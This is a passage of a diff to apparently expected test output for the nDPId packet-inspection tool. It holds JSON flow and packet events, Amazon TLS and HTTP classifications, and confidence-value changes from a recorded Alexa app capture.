00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1490976043814,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976043814,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8bx1AAEAG3hmsECrYSBXOh6SSAbsCViBwAAAAAKAC\/\/9BAwAAAgQFtAQCCAoA9k9tAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1490976043869,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976043869,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwnhhAAOcGCCpIFc6HrBAq2AG7pJISbmyuAlYgcXASH\/4uVQAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1490976043870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976043870,"pkt":"AMDKkaPvePiC0\/vCCABFAAAobx5AAEAG3iysECrYSBXOh6SSAbsCViBxEm5sr1AQAVd4xgAA"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976043814,"flow_last_seen":1490976043870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976043870,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976043814,"flow_last_seen":1490976043870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976043870,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1490976043873,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976043873,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwUbtAAOcGVIdIFc6HrBAq2AG7pJG1BAKQQ3Bp4nASH\/5rUgAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1490976043875,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976043875,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJo1AAEAGJr6sECrYSBXOh6SRAbtDcGnitQQCkVAQAVe1wwAA"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976043814,"flow_last_seen":1490976043875,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976043875,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976043814,"flow_last_seen":1490976043941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1665,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1490976043941,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01281{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976043814,"flow_last_seen":1490976043941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1490976043941,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976043814,"flow_last_seen":1490976043875,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976043875,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976043814,"flow_last_seen":1490976043941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1665,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1490976043941,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01281{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976043814,"flow_last_seen":1490976043941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1490976043941,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044189,"flow_last_seen":1490976044189,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044189,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1490976044189,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044189,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8KphAAEAGHFesECrYNF7ohrJpAbvSj2UKAAAAAKAC\/\/8X6wAAAgQFtAQCCAoA9k+SAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044219,"flow_last_seen":1490976044219,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044219,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1490976044219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044219,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8UU1AAEAG9aGsECrYNF7ohrJqAbsS8h7YAAAAAKAC\/\/8dtwAAAgQFtAQCCAoA9k+VAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1490976044265,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044265,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwK9ZAAOcGdCQ0XuiGrBAq2AG7smlcwjrL0o9lC3ASH\/7s8AAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1490976044267,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044267,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoKplAAEAGHGqsECrYNF7ohrJpAbvSj2ULXMI6zFAQAVc3YgAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044189,"flow_last_seen":1490976044269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044269,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044189,"flow_last_seen":1490976044269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044269,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1490976044285,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044285,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwZ65AAOcGOEw0XuiGrBAq2AG7smoL+FEyEvIe2XASH\/4tIwAAAgQFtAEDAwY="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1490976044287,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044287,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoUU5AAEAG9bSsECrYNF7ohrJqAbsS8h7ZC\/hRM1AQAVd3lAAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044219,"flow_last_seen":1490976044288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044288,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044189,"flow_last_seen":1490976044331,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044331,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":441,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044219,"flow_last_seen":1490976044404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044404,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044219,"flow_last_seen":1490976044288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044288,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044189,"flow_last_seen":1490976044331,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044331,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":441,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044219,"flow_last_seen":1490976044404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044404,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1490976044419,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044419,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8G7BAAEAGvmmsECrYCsl+8Z0IH5CvoFXQAAAAAKAC\/\/\/UsgAAAgQFtAQCCAoA9k+qAAAAAAEDAwg="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044439,"flow_last_seen":1490976044439,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044439,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1490976044439,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044439,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8t7dAAEAGjzesECrYNF7ohsG1AFD+AvgcAAAAAKAC\/\/9LawAAAgQFtAQCCAoA9k+rAAAAAAEDAwg="} @@ -248,120 +248,120 @@ 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1490976044521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044521,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8pBJAAEAGotysECrYNF7ohrJvAbuLWOumAAAAAKAC\/\/\/YXQAAAgQFtAQCCAoA9k+0AAAAAAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1490976044548,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044548,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwjz9AAOcGELs0XuiGrBAq2ABQwbWwdDtt\/gL4HXASH\/7MNQAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1490976044550,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044550,"pkt":"AMDKkaPvePiC0\/vCCABFAAAot7hAAEAGj0qsECrYNF7ohsG1AFD+AvgdsHQ7blAQAVcWpwAA"} -01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044439,"flow_last_seen":1490976044552,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1490976044552,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/lib\/bootstrap\/img\/glyphicons-halflings.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 